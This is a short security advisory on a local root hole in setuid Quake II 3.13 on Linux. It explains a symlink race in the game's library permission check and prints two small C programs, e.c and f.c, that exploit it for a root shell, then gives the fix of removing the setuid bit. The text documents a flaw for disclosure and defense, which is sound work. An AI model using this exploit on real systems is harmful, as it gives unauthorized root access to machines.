COMMAND

    Quake II 3.13

SYSTEMS AFFECTED

    Linux (at least)

PROBLEM

    'kevingeo' found following.   Vulnerable is everyone who  followed
    the installation  instructions and  made Quake2  setuid root.   In
    version  3.13,  Quake2  trys  to  protect  itself  by checking the
    permissions of a library before loading it.  This just  introduces
    a race condition.   Simply find  a file that is owned by root  and
    has 0700 permissions,  call ref_root.so ref_root.real.so,  run e.c
    (./e /usr/games/quake2/ref_soft.so &, for example) in  background,
    and then run f.c.  You'll have a root shell after a few minutes.

    e.c:
    ====

    #include <unistd.h>

    void main(int argc, char **argv) {
    while(1) {
            unlink("ref_root.so");
            symlink(argv[1],"ref_root.so");
            unlink("ref_root.so");
            symlink("ref_root.real.so","ref_root.so");
    }
    }

    f.c:
    ====

    #include <stdlib.h>

    void main() {
    while (1) {
    system("/usr/games/quake/quake2 +set vid_ref root");
    }
    }

SOLUTION

    Unsuid quake:

        chmod u-s /usr/games/quake/quake2